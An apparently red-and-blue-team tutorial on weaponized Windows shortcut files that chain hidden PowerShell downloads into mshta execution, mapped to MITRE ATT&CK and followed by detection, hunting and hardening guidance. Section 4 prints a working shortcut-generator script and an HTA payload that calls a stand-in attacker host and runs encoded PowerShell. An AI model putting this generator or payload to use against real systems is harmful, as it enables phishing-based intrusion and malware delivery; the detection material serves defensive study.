Weaponized LNK Files for Initial Access and Delivery

1. Why Shortcut Files Became a First Class Initial Access Vector

Windows shortcut files (.lnk) were designed as a convenience feature. They wrap a target path plus parameters into a compact object that the shell executes when a user double clicks the icon. That “convenience layer” sits exactly on the user execution boundary, which makes .lnk files an ideal place to hide execution chains that look benign at first glance.

After Microsoft hardened Office macros and introduced stricter Mark of the Web handling, many threat actors shifted from macro documents to container formats and shortcuts such as ISO plus LNK, RAR plus LNK, or bare LNK attachments. Campaigns from crimeware and state sponsored actors have been observed delivering downloaders, stealers and full remote access trojans with nothing more than a weaponized shortcut and a user double click. (Unit 42)

Recent telemetry shows very large growth in malicious LNK usage, with hundreds of thousands of distinct samples in the wild, and multiple public reports describing LNK based phishing and SmartScreen or MoTW bypass chains. (Unit 42)

For red teams this makes LNK a realistic initial access primitive to emulate. For blue teams it is a surface that cannot be ignored, since it rides entirely on built in Windows behavior and legitimate system binaries.

This article focuses on a specific pattern:

• LNK file → launches powershell.exe → which downloads an HTML application → and executes it through mshta.exe.

We will map this chain to MITRE ATT&CK, dissect how it works technically, and then switch perspectives to detection, hunting and mitigation.

2. MITRE ATT&CK and Kill Chain Mapping

2.1 MITRE ATT&CK Techniques

The example LNK plus PowerShell plus mshta chain touches several ATT&CK techniques:

• Initial Access

  • T1566.001 Spearphishing Attachment If the LNK arrives as an email attachment or inside a compressed archive delivered by email.

• Execution

  • T1204.002 User Execution: Malicious File The victim must double click the shortcut. The LNK is the malicious file that triggers execution. (MITRE ATT&CK)

  • T1059.001 Command and Scripting Interpreter: PowerShell The shortcut launches powershell.exe with a crafted command line. (www.trendmicro.com)

  • T1218.005 System Binary Proxy Execution: Mshta mshta.exe is used as a signed Windows binary that executes remote or local HTA or script content. (MITRE ATT&CK)

• Defense Evasion

  • T1218.005 System Binary Proxy Execution: Mshta Living off the land by proxying payload execution through a trusted binary rather than a custom executable. (MITRE ATT&CK)

  • T1564.003 Hide Artifacts: Hidden Window The example uses hidden PowerShell windows.

• Command and Control

  • T1105 Ingress Tool Transfer PowerShell downloads a second stage HTML or script payload from a remote URL before mshta processes it. (www.trendmicro.com)

If the HTA or script loader injects shellcode or launches a RAT, further ATT&CK techniques related to credential access, discovery, lateral movement and C2 apply. For the scope of this article we keep the focus on the initial execution chain.

2.2 Kill Chain View

In a classic intrusion kill chain model, a LNK based initial access scenario looks like this:

1. Reconnaissance Threat actor harvests emails and organizational context for convincing lures.

2. Weaponization

   • Builds an HTA or JavaScript loader.

   • Hosts it on attacker controlled infrastructure.

   • Generates a malicious LNK that launches PowerShell, downloads the HTA to a temporary path and runs mshta.exe against it.

3. Delivery LNK or archive containing the LNK is delivered via spearphishing, instant messaging, drive by download or USB drop.

4. Exploitation User double clicks the LNK. Windows Shell invokes the target specified in the shortcut with its arguments, which ultimately leads to PowerShell and mshta execution.

5. Installation The HTA or script payload installs a downloader, loader or RAT, or creates persistence such as registry run keys, scheduled tasks or startup folder artifacts.

6. Command and Control The installed payload connects back to C2 for tasking.

7. Actions on Objectives Data theft, lateral movement, encryption or whatever goal the operator has.

A GitBook friendly way to represent this chain is to embed a diagram such as:

flowchart LR
    A[User opens LNK] --> B[explorer.exe]
    B --> C[powershell.exe with hidden window]
    C --> D[Download HTML / HTA to %TEMP%]
    D --> E[mshta.exe executes local HTA]
    E --> F[Second stage payload or loader]
    F --> G[Persistence / C2 / Actions on objectives]

This diagram can be exported as PNG or SVG and inserted into your GitBook chapter as an overview of the execution path.

3. How Windows Shortcut Files Actually Work

3.1 Shell Link Format in Brief

Windows shortcut files follow the Shell Link Binary File Format. Conceptually, a LNK contains:

• A header with metadata

• Link target information

• Optional location and description information

• Command line arguments and working directory

• Icon information and other shell specific properties

When a user double clicks a .lnk, explorer.exe uses the Shell Link resolver to:

• Read the TargetPath (for example C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe or simply powershell.exe if in PATH)

• Append the configured Arguments string

• Spawn the process with those parameters as if the user had launched it directly from a console

From a defender perspective this means that the LNK itself never appears directly as a process. What appears are its targets and child processes, which can be legitimate applications or LOLBins.

Security research has shown that LNK files can be abused in several ways:

• As pure proxies for script interpreters and LOLBins such as PowerShell, wscript.exe, mshta.exe or cmd.exe

• To bypass certain Mark of the Web constraints and SmartScreen logic, especially in combination with container formats and crafted properties (ASEC)

• To conceal dangerous command lines behind innocuous looking icons and names. GUI inspection often hides or truncates the real command arguments. (McAfee)

4. Case Study: A PowerShell Based LNK Generator

The following PowerShell script, provided as an example, uses COM automation to create a shortcut that triggers a PowerShell plus mshta execution chain:

param(
    [Parameter(Mandatory=$true)]
    [string]$URL,
    
    [Parameter(Mandatory=$true)]
    [string]$Output,
    
    [string]$Icon = "C:\Windows\System32\imageres.dll,48"
)

# Create LNK file using COM object
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($Output)
$Shortcut.TargetPath = "powershell.exe"
$Shortcut.Arguments = "-windowstyle hidden -Command `"Start-Process -WindowStyle Hidden mshta.exe `$env:TEMP\payload.html`"; Invoke-WebRequest -Uri '$URL' -OutFile `$env:TEMP\payload.html"
$Shortcut.IconLocation = $Icon
$Shortcut.Save()

On a high level, this script demonstrates how an operator could generate a shortcut that chains multiple binaries and actions. In any real environment this should only be used in tightly controlled, explicitly authorized tests such as red team exercises and lab simulations.

Download PoC: https://github.com/CyberSecurityUP/Initial-Access-Techniques/blob/main/LNK/LNK-Generate.ps1

4.1 Parameterization

The param block defines three parameters:

• $URL Remote location of the HTML or HTA payload that mshta will eventually execute.

• $Output Path where the .lnk file will be created, for example C:\Users\<user>\Desktop\Invoice.lnk.

• $Icon Optional icon resource string so the shortcut looks more convincing. It points to a DLL plus index entry in the icon table (imageres.dll,48 is a standard system icon).

This makes the script reusable for any payload URL and any output filename.

4.2 COM Automation with WScript.Shell

The script then uses the Windows Script Host COM object:

$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($Output)

The WScript.Shell object exposes a CreateShortcut method that returns an object representing the LNK. Properties of this object map to Shell Link fields:

• TargetPath

• Arguments

• IconLocation

• WorkingDirectory

• Description

• And others

When Save() is called, the COM object serializes the structure to a proper .lnk file.

Using COM here avoids the need to manually craft the binary LNK structure. This is a common pattern in both administrative scripts and offensive tooling.

4.3 Target Path and Arguments

The crucial part is:

$Shortcut.TargetPath = "powershell.exe"
$Shortcut.Arguments = "-windowstyle hidden -Command `"Start-Process -WindowStyle Hidden mshta.exe `$env:TEMP\payload.html`"; Invoke-WebRequest -Uri '$URL' -OutFile `$env:TEMP\payload.html"

When the user double clicks the LNK, explorer.exe runs essentially:

powershell.exe -windowstyle hidden -Command "Start-Process -WindowStyle Hidden mshta.exe $env:TEMP\payload.html"; Invoke-WebRequest -Uri 'https://example[.]com/payload.html' -OutFile $env:TEMP\payload.html

The command performs two key actions:

1. Execution through mshta Start-Process -WindowStyle Hidden mshta.exe $env:TEMP\payload.html

   • Launches mshta.exe in a hidden window

   • Points it to a local file %TEMP%\payload.html

2. Payload retrieval Invoke-WebRequest -Uri <URL> -OutFile $env:TEMP\payload.html

   • Downloads the remote payload from the specified URL

   • Writes it to %TEMP%\payload.html

Because -Command can chain statements separated by semicolons, both retrieval and execution can be composed in one line.

Some operators may choose to reverse this order or add control logic, but the concept is the same. PowerShell is used as an orchestrator that fetches content from the network and hands it off to mshta, which in turn runs the HTA or script in the context of the current user. (www.trendmicro.com)

4.4 Mshta as a Proxy

mshta.exe is a signed Windows binary that executes Microsoft HTML Applications and script content. Its properties that are attractive for adversaries and red teams include: (MITRE ATT&CK)

• Present on all supported Windows systems

• Signed by Microsoft

• Able to execute VBScript and JScript inside HTA containers

• Capable of loading HTA content from local files or remote URLs

• Frequently allowed by naïve application allow lists and legacy security controls

// payload.html
<script>
window.location = "http://attacker.com/shell.exe";
new ActiveXObject('WScript.Shell').Run("powershell -e <base64_payload>");
</script>

By downloading the HTML payload first and then invoking mshta.exe against a local path, the example chain can avoid some rules that focus only on remote HTA in the command line. That is exactly the kind of subtle variation that defenders need to think about when building analytics.

5. Adversary Simulation Workflow Around This Chain

From a red team perspective, a shortcut based chain should sit within a realistic delivery and post-exploitation plan rather than exist as an isolated trick. A typical lab scenario could follow these steps conceptually:

1. Prepare an HTA or script loader that does something observable and measurable in the test environment, for example establish a test C2 session or drop a benign marker file.

2. Host the payload on a controlled internal web server or staging system.

3. Use a generator similar to the PowerShell example to build multiple LNK variants:

   • Different icon resources

   • Different file names aligned with the phishing lure

   • Different staging URLs (for example per user or per campaign)

4. Package those shortcuts into ZIP archives or embed them in ISO images to emulate current tradecraft described in public reports. (Unit 42)

5. As part of a properly authorized engagement, deliver the artifacts through the agreed channel and observe which controls trigger, which logs appear, and how fast the SOC can detect and respond.

All of this must be done under contract and with explicit written approval. The same patterns that real attackers abuse can be used productively by defenders when embedded in a structured purple team exercise.

6. Detection and Threat Hunting

The real value of understanding chains like LNK plus PowerShell plus mshta comes when blue teams operationalize that understanding into concrete detections and hunts.

6.1 High Level Detection Surfaces

Defenders can monitor several layers:

• File system Presence of unusual .lnk files in user controlled directories such as Downloads, temporary extraction folders, or removable media.

• Process creation explorer.exe spawning powershell.exe which spawns mshta.exe, especially with hidden window flags and suspicious arguments. (Elastic)

• Command line inspection PowerShell command lines that contain:

  • -WindowStyle Hidden

  • Both Invoke-WebRequest (or iwr) and mshta.exe

  • Environment variables such as %TEMP% or obfuscated paths

• Network telemetry Outbound HTTP or HTTPS from endpoints shortly after LNK execution that retrieves HTA or HTML content from untrusted hosts.

• Script block, PowerShell and AMSI logs Decoded script content that shows suspicious combinations of Start-Process, mshta.exe, and download commands.

• Endpoint security alerts Many vendors ship rules explicitly targeted at mshta misuse and malicious LNK patterns. (MITRE ATT&CK)

6.2 Process Chain Analytics

One of the more robust analytics for this chain is to correlate process ancestry and command line content. For example, structured pseudo logic:

• Alert if:

  • ProcessName = "mshta.exe"

  • Parent process is powershell.exe or pwsh.exe

  • Grandparent process is explorer.exe or Office processes

  • Command line references %TEMP% or a file with extension .hta or .html

  • And within a short time window there is a network connection to an untrusted host

The MITRE ATT&CK detection strategy for mshta describes similar approaches, focusing on command line arguments that reference scripts or remote URLs and follow on activity such as file creation or additional process spawning. (MITRE ATT&CK)

6.3 LNK Focused Hunting

Hunting for malicious shortcut files involves both content analysis and behavioral context. Several public resources walk through patterns in malicious LNK samples and suggest analytics, including Vitamin D, Wazuh and VirusTotal based approaches. (cybereason.com)

Useful ideas include:

• Flag LNKs that:

  • Have a target of powershell.exe, wscript.exe, cscript.exe, cmd.exe, mshta.exe or other interpreters instead of common GUI applications

  • Contain long or heavily obfuscated argument strings

  • Reside in user profile paths but use system icons or names that mimic documents or folders

  • Reference network shares, UNC paths or remote paths

• Correlate LNK creation time with:

  • Arrival of new ZIP or ISO files in Downloads

  • USB insertion events

  • Email attachment saves

Although parsing the full Shell Link format can be complex, there are open source tools and forensic libraries that extract target and argument metadata at scale.

6.4 Example Detection Logic Snippets

Without binding to any specific product, defenders can derive queries from common patterns:

• Search for mshta.exe executions that:

  • Include .hta, .html or .js in the command line

  • Or include http:// or https:// in the arguments

  • And originate from office processes, browsers or PowerShell

Vendors such as Elastic, Fortinet and Malwarebytes have published sample rules that look for mshta.exe with remote URLs and anomalous parent processes. (Elastic)

For LNK specific detection, Splunk and Wazuh have shown approaches that combine Windows event logs, file system monitoring and threat intelligence about known malicious LNK hashes. (Splunk)

7. Indicators of Compromise and Telemetry Patterns

While static IoCs such as hashes change quickly, behavioral patterns are more stable. Some relevant IoCs and artifacts for this family of chains include:

7.1 File and Registry Artifacts

• Unusual .lnk files in:

  • User desktop, Downloads and temporary directories

  • Startup folders under %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup if shortcuts are used for persistence

• HTA or HTML payloads dropped into %TEMP% with random names or generic names such as payload.html, update.html, task.hta.

• Registry entries creating persistence that point to shortcuts or mshta commands.

7.2 Process and Command Line Artifacts

• explorer.exe spawning powershell.exe with:

  • -WindowStyle Hidden

  • Encoded commands or long base64 blobs

  • Network related cmdlets such as Invoke-WebRequest, Invoke-RestMethod, .DownloadFile methods from System.Net.WebClient.

• powershell.exe spawning mshta.exe that:

  • References a local path in %TEMP%, %ProgramData% or a user profile directory

  • Shows no visible window

  • Is shortly followed by further child processes or script engines.

• mshta.exe making outbound network connections to hosts that are not known enterprise services. (Elastic)

7.3 Network and Infrastructure IoCs

• URLs ending in .hta, .html, .js or plain text endpoints where response bodies contain HTA tags or script blocks.

• Domains or IPs associated with known LNK and mshta campaigns. Threat intelligence feeds and public reports such as those describing Remcos or other RAT campaigns frequently provide example IoCs that can be loaded into hunting pipelines. (The Hacker News)

Defenders should treat IoCs from public write ups as seeds for analytics and as retro hunting material within their own data.

8. Hardening and Mitigation

Understanding how LNK based chains work enables more systematic hardening.

8.1 Control mshta and Scripting Engines

Enterprise baselines should strongly consider:

• Blocking or restricting mshta.exe through:

  • Application allow listing tools such as AppLocker or WDAC

  • Attack surface reduction rules where available

  • Explicit EDR prevention policies

• Limiting PowerShell to constrained language mode or heavily restricted execution policies on user workstations, with exceptions only where operationally needed. (McAfee)

Any decision to allow mshta.exe should be backed by a documented business requirement and compensating controls.

8.2 Harden Shortcut and Container Handling

Given how often LNK files appear inside archive formats and ISO containers, defenders should:

• Treat inbound .zip, .rar, .iso and .img files with LNK content as high risk.

• Ensure that email and web gateways:

  • Inspect compressed content

  • Block LNK attachments where feasible

  • Or rewrite and detonate them in sandbox environments. (McAfee)

End user training is still relevant, but technical controls are critical since icon and file name spoofing can make malicious shortcuts look indistinguishable from documents.

8.3 Keep Windows and SmartScreen Patched

Recent years have seen several SmartScreen and Mark of the Web bypass vulnerabilities where crafted files or desktop shortcuts can evade normal warning dialogs. Keeping endpoints current with security updates reduces the number of bypass paths available to threat actors. (ASEC)

Blue teams should stay aware of advisories that specifically mention .lnk or shortcut related flaws and prioritize those patches.

8.4 Logging and Telemetry

For this type of chain, the following logging settings are particularly valuable:

• Process creation logs with full command lines (Sysmon, Windows Event 4688 or EDR equivalents)

• PowerShell operational and script block logging

• AMSI integration in EDR products

• DNS and web proxy logs for correlating script execution with outbound requests

• File creation and modification events in locations such as %TEMP%, Downloads and Startup folders

These are the raw materials that detection engineering teams use to create and maintain analytics against evolving tradecraft.

9. Using This Knowledge In Red And Blue Teams

For red teams and adversary simulation:

• Use chains like LNK plus PowerShell plus mshta within defined rules of engagement.

• Tie each part of your scenario to MITRE ATT&CK techniques and clearly document them in reports so defenders can align detections and controls.

• Vary the chain in realistic ways guided by public threat research, for example by:

  • Changing the order of download versus execution

  • Using different LOLBins for staging

  • Embedding LNKs in formats observed in current campaigns

For blue teams and detection engineering:

• Translate high level descriptions into concrete analytics that fit your logging stack.

• Continuously test these analytics using controlled simulations, for example by replaying benign versions of the chain in a lab or using open source adversary emulation tools.

• Use threat intelligence and public IoCs not only for block lists but as inspiration for new behavior based queries.

Both sides benefit from a precise understanding of how these apparently simple shortcut files can orchestrate complex execution paths through trusted Windows binaries.

10. Summary

Weaponized LNK files are not an exotic technique. They are a practical, widely abused method to turn a single user click into a multi stage execution chain that stays inside the boundaries of built in Windows behavior.

The script examined here demonstrates a specific pattern:

• A shortcut that targets PowerShell

• PowerShell that silently downloads an HTML or HTA payload

• And mshta that executes that payload as if it were a legitimate HTML application

Mapped to MITRE ATT&CK and to the intrusion kill chain, this pattern provides a compact yet powerful frame for adversary simulation and defensive design. Red teams can use it to emulate real world tradecraft in safe conditions. Blue teams can use it to inform logging standards, detection logic, threat hunting and technical hardening.

Understanding what happens between a double click on a shortcut and the appearance of a C2 session is a valuable step toward more realistic security testing and more resilient Windows environments.

• TechRadar